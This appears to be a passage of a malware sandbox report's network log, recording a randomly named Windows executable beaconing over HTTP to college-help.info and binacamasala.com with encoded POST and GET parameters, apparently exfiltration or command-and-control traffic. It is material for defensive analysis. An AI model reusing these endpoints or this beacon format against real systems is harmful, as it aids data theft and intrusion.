3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 11, 2024 08:31:37.323129892 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	38.88.82.56	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:39.383377075 CET	825	OUT	POST /fu91/ HTTP/1.1 Host: www.college-help.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.college-help.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.college-help.info/fu91/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 4b 58 62 46 59 64 78 42 76 41 48 48 4f 73 32 67 76 33 36 4b 6e 72 49 4d 30 30 47 35 69 4a 6e 79 59 4f 51 56 42 6d 51 74 67 4b 59 55 56 74 4c 71 53 78 71 35 5a 35 32 44 58 4c 5a 45 73 7a 6a 74 75 69 79 75 4c 61 62 6c 73 5a 65 68 58 79 44 31 45 6f 57 49 4f 68 41 6a 30 64 74 57 70 69 76 47 45 72 4f 67 70 7a 6a 6c 54 44 72 6b 56 41 62 5a 49 69 71 69 77 48 77 34 65 32 73 56 50 54 53 70 4a 61 48 64 47 6e 74 67 57 49 47 38 4d 32 38 2b 4c 2f 62 34 38 79 59 63 4d 71 47 68 65 48 59 66 68 30 50 72 48 46 53 70 78 39 55 54 46 62 65 55 36 4f 48 64 73 2b 65 51 4b 37 62 44 43 41 54 49 47 67 43 4d 4b 50 66 68 63 2b 48 49 76 2b 77 32 41 6e 74 55 50 34 63 3d Data Ascii: Ir8HUj=KXbFYdxBvAHHOs2gv36KnrIM00G5iJnyYOQVBmQtgKYUVtLqSxq5Z52DXLZEszjtuiyuLablsZehXyD1EoWIOhAj0dtWpivGErOgpzjlTDrkVAbZIiqiwHw4e2sVPTSpJaHdGntgWIG8M28+L/b48yYcMqGheHYfh0PrHFSpx9UTFbeU6OHds+eQK7bDCATIGgCMKPfhc+HIv+w2AntUP4c=
Nov 11, 2024 08:31:39.883871078 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:31:39 GMT Server: Apache Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT ETag: "49d-626426de29b28" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 11, 2024 08:31:39.884116888 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	38.88.82.56	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:41.931054115 CET	10907	OUT	POST /fu91/ HTTP/1.1 Host: www.college-help.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.college-help.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.college-help.info/fu91/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 4b 58 62 46 59 64 78 42 76 41 48 48 4f 73 32 67 76 33 36 4b 6e 72 49 4d 30 30 47 35 69 4a 6e 79 59 4f 51 56 42 6d 51 74 67 4b 51 55 56 61 6a 71 64 79 79 35 65 35 32 44 4a 37 5a 46 73 7a 6a 77 75 6a 61 79 4c 61 6d 65 73 61 6d 68 57 53 66 31 4e 36 75 49 46 68 41 6a 72 4e 74 54 30 79 76 70 45 72 65 6b 70 7a 7a 6c 54 44 72 6b 56 47 66 5a 4d 77 53 69 38 6e 77 37 4f 6d 73 4a 65 44 54 38 4a 61 65 2f 47 6b 42 77 57 35 6d 38 50 57 73 2b 48 70 33 34 6a 43 59 53 43 4b 47 35 65 48 56 48 68 30 54 4e 48 46 6d 50 78 36 38 54 48 76 50 7a 71 4c 6e 2f 7a 4f 4b 54 65 61 37 5a 63 7a 43 45 48 43 33 34 4b 73 4c 39 66 4d 48 6b 6f 75 4e 71 66 58 31 71 57 50 6a 76 63 69 48 2f 71 67 35 53 75 69 51 71 4e 51 76 74 6c 4e 4e 35 53 7a 43 76 62 2f 76 32 6d 52 49 62 75 7a 47 35 32 68 72 65 69 79 6c 4c 66 62 79 63 76 70 64 65 68 4b 75 78 62 6a 72 36 44 52 64 35 6f 57 32 45 6d 62 37 2b 69 37 5a 52 75 30 46 45 4f 4e 39 6c 50 52 56 69 39 4e 69 4d 7a 34 4c 6d 62 79 76 70 4a 43 74 6f 6f 35 43 75 54 5a 78 6e 35 4c 41 [TRUNCATED] Data Ascii: Ir8HUj=KXbFYdxBvAHHOs2gv36KnrIM00G5iJnyYOQVBmQtgKQUVajqdyy5e52DJ7ZFszjwujayLamesamhWSf1N6uIFhAjrNtT0yvpErekpzzlTDrkVGfZMwSi8nw7OmsJeDT8Jae/GkBwW5m8PWs+Hp34jCYSCKG5eHVHh0TNHFmPx68THvPzqLn/zOKTea7ZczCEHC34KsL9fMHkouNqfX1qWPjvciH/qg5SuiQqNQvtlNN5SzCvb/v2mRIbuzG52hreiylLfbycvpdehKuxbjr6DRd5oW2Emb7+i7ZRu0FEON9lPRVi9NiMz4LmbyvpJCtoo5CuTZxn5LAgfcpI9zHhwfSs2cgLi4/snMBqHNWze7iqm4LZi65cBdweBuV8EAQmWUUYzWgy+SKmBdumD/4gbtPNtC+INuF//frUrIocjTWV6Wh+kbedv4yxEu7J9bpqDtk0UPb/47byDT9km8xYGirlZIOrD5BEBXN7B/F8t5cP9EfwUlfrnb7/X/4spPP1e4EQzCFhegVbQMJBKxu1IDzyib3EzJnBQlDv2XkYhf2eV16PBR6af3a3SCujH3cDCfUhbJhgBds0Xy3n/shYXUlxHC2QsGV6Cvsjf/mcPR997rbKegkw8dPFs2D+SG/Rvl4amRxF/1GG7whNkTD4W8eaM1Ct0BwZMn1zVmc6qKAplt+t+2Zen5yn3zux1eOTRM57xyczWhlmqfL5QSvQxE6AIn3ed9g4QW+qm8nIQ8nrlcBIMd5fM8WiDub+AhobzMBt7Bapl5s6jKDowQ4ErmTNe04mxI+kz7qWoDnuBet72UbuEcYVFrxUfH/ISmI0C97lzYSii1w4kbbj4W9ud6N2bQ1OuP4Z4zzoE15x3XLcl0zfdwPq2K40pnEktU5qzOhTCp32Kw8r3FCDdmrOh3iJ1WNsZ1Gdt5kBU1nZI6in7p/hX5sAqpbR3k5RgbnB4/4AC48JmNIykule6VCQxT00zmlmvlfQ8ASsxcCmzIUxR [TRUNCATED]
Nov 11, 2024 08:31:42.477579117 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:31:42 GMT Server: Apache Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT ETag: "49d-626426de29b28" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 11, 2024 08:31:42.477593899 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	38.88.82.56	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:44.616900921 CET	538	OUT	GET /fu91/?Ir8HUj=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.college-help.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:31:45.157999039 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:31:45 GMT Server: Apache Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT ETag: "49d-626426de29b28" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Nov 11, 2024 08:31:45.158015013 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:50.292423010 CET	802	OUT	POST /usv6/ HTTP/1.1 Host: www.binacamasala.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.binacamasala.com Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.binacamasala.com/usv6/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 65 69 72 75 41 33 31 33 64 63 77 47 31 5a 48 55 42 32 2b 36 78 37 6d 4e 42 34 35 36 69 54 76 53 4a 78 78 35 76 65 75 58 66 77 38 59 4a 46 2f 43 32 54 6f 78 30 4d 37 2f 67 6e 37 48 4f 2b 79 71 57 43 78 53 37 47 44 36 6d 37 47 79 4f 68 42 36 33 73 68 7a 74 37 63 39 37 33 70 6f 6f 53 71 6b 72 67 43 37 52 62 73 62 78 6a 63 4f 33 6b 68 75 34 65 4b 56 75 56 4b 5a 6f 79 65 34 6c 2f 4a 6f 52 30 51 6d 73 74 36 56 66 2f 48 66 6f 56 72 61 56 66 43 6d 58 66 66 74 39 65 42 64 56 44 6f 4e 4c 48 4e 2b 59 68 69 38 72 51 59 7a 33 5a 39 44 73 5a 43 4c 39 76 63 49 69 42 65 52 7a 4c 4b 57 48 41 3d 3d Data Ascii: Ir8HUj=eiruA313dcwG1ZHUB2+6x7mNB456iTvSJxx5veuXfw8YJF/C2Tox0M7/gn7HO+yqWCxS7GD6m7GyOhB63shzt7c973pooSqkrgC7RbsbxjcO3khu4eKVuVKZoye4l/JoR0Qmst6Vf/HfoVraVfCmXfft9eBdVDoNLHN+Yhi8rQYz3Z9DsZCL9vcIiBeRzLKWHA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:52.836875916 CET	822	OUT	POST /usv6/ HTTP/1.1 Host: www.binacamasala.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.binacamasala.com Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.binacamasala.com/usv6/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 65 69 72 75 41 33 31 33 64 63 77 47 30 34 33 55 4e 78 43 36 67 62 6d 4d 45 34 35 36 6f 7a 76 57 4a 78 74 35 76 66 72 50 66 6d 45 59 49 6e 6e 43 33 53 6f 78 31 4d 37 2f 76 48 37 43 41 65 79 68 57 43 4e 30 37 44 72 36 6d 36 6d 79 4f 6c 4e 36 30 62 31 77 73 72 63 2f 30 58 70 51 6d 79 71 6b 72 67 43 37 52 62 6f 68 78 6a 45 4f 33 58 70 75 71 76 4b 55 79 46 4b 61 68 53 65 34 68 2f 4a 73 52 30 51 59 73 70 37 77 66 35 62 66 6f 55 62 61 56 4f 43 6c 65 66 66 72 67 4f 42 44 61 69 4a 36 46 57 38 68 66 44 4f 42 74 7a 70 58 2f 2f 77 5a 39 6f 6a 63 76 76 34 37 2f 47 58 6c 2b 49 33 66 63 49 72 66 51 68 55 66 44 71 2f 43 4d 32 49 5a 4f 66 4b 45 6f 48 30 3d Data Ascii: Ir8HUj=eiruA313dcwG043UNxC6gbmME456ozvWJxt5vfrPfmEYInnC3Sox1M7/vH7CAeyhWCN07Dr6m6myOlN60b1wsrc/0XpQmyqkrgC7RbohxjEO3XpuqvKUyFKahSe4h/JsR0QYsp7wf5bfoUbaVOCleffrgOBDaiJ6FW8hfDOBtzpX//wZ9ojcvv47/GXl+I3fcIrfQhUfDq/CM2IZOfKEoH0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:55.384597063 CET	10904	OUT	POST /usv6/ HTTP/1.1 Host: www.binacamasala.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.binacamasala.com Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.binacamasala.com/usv6/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 65 69 72 75 41 33 31 33 64 63 77 47 30 34 33 55 4e 78 43 36 67 62 6d 4d 45 34 35 36 6f 7a 76 57 4a 78 74 35 76 66 72 50 66 6d 4d 59 49 57 48 43 32 78 41 78 76 4d 37 2f 6d 6e 37 44 41 65 79 34 57 43 6c 34 37 44 6e 4d 6d 2f 69 79 4e 47 46 36 78 75 5a 77 6d 72 63 2f 73 6e 70 72 6f 53 71 78 72 67 53 2f 52 62 59 68 78 6a 45 4f 33 52 4e 75 39 75 4b 55 77 46 4b 5a 6f 79 65 38 6c 2f 4a 55 52 30 49 49 73 70 76 4b 66 4b 44 66 6f 30 4c 61 47 73 36 6c 63 2f 66 70 68 4f 41 51 61 69 46 6c 46 53 6b 74 66 48 4f 76 74 30 5a 58 36 62 56 74 67 37 36 48 35 63 6f 30 68 6b 54 34 34 34 76 42 45 36 62 33 57 54 4e 45 62 34 50 65 43 6c 5a 52 65 4d 71 77 33 67 30 46 31 75 31 75 6c 6b 4a 6a 34 6e 74 4d 5a 7a 71 64 43 4f 7a 4b 4a 70 38 77 62 6f 6c 47 37 63 50 4b 30 39 73 6b 63 7a 36 59 62 57 65 58 2f 72 79 39 4f 73 34 67 59 55 59 35 6a 61 78 54 68 5a 71 58 58 48 51 61 4d 54 52 36 6d 42 64 32 47 42 57 45 67 6b 62 63 68 45 72 4c 7a 75 45 6f 33 6e 79 75 61 4b 61 59 65 6f 37 7a 73 69 56 33 53 66 53 63 31 77 4d [TRUNCATED] Data Ascii: Ir8HUj=eiruA313dcwG043UNxC6gbmME456ozvWJxt5vfrPfmMYIWHC2xAxvM7/mn7DAey4WCl47DnMm/iyNGF6xuZwmrc/snproSqxrgS/RbYhxjEO3RNu9uKUwFKZoye8l/JUR0IIspvKfKDfo0LaGs6lc/fphOAQaiFlFSktfHOvt0ZX6bVtg76H5co0hkT444vBE6b3WTNEb4PeClZReMqw3g0F1u1ulkJj4ntMZzqdCOzKJp8wbolG7cPK09skcz6YbWeX/ry9Os4gYUY5jaxThZqXXHQaMTR6mBd2GBWEgkbchErLzuEo3nyuaKaYeo7zsiV3SfSc1wMdsyBIphx7GrsbSuoFl0CAYcr825dggSLgKbbjqNZjqZbGHt04cdDiVP2MAyY+S0DLCVJD2sMtHgH9oDzX+73ot6V6QhNTIQltTifcvCPUfv1G+SS5ZsYjW9tjTEWhIHjSQiojewm2hnE+ClrcXO1D94iG/gVZFoulBsWQ3ByZJb0hA/8AKAnqGKI3dYTWsufRCXMwE4UdtqHnUVQ/jE/mSRSUJ2pnnPh3icrclfQbXD69Hwjf8nHreggz7L/CoTJ2h0Vw7aP43Ag5F3tAnFgj2SIFefS4Og8GmUjlappPeVevOSR9PSLMcFmfZnRq9N3Y88jHNzCwMEfrazdq02e07MPJ3n8TfN/87eW9fa2Hg9nutiEpQDOLBu6cEFpMiHR6Rx5b4P7qJEm9kzxSAXVWfWa+Txc5Pg3c0r3Guv79kaQai/k3R0xvYJ2xUR5bpnS+2069CIud1NwWqERxWNArz2g90pX0WG4n+oekVtUpWWafYSgYtU11BTj+VCUjAru0YLqoeBBt/HNhDMnH6RcHzBEkoGWQfSYDEY6LL8r5ILmtA8JqGnH7utd+KudqUZvJsuRM4TmS5bLNKTEJUtjg4D8LzuFuwK8WolQjwnUE5muB6CeQC2vQ47SWPEDbm1yHWbn4KC7F3ZtxgGbeWvhagxEF8XUZOrKFV [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49771	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:57.926712036 CET	537	OUT	GET /usv6/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk= HTTP/1.1 Host: www.binacamasala.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
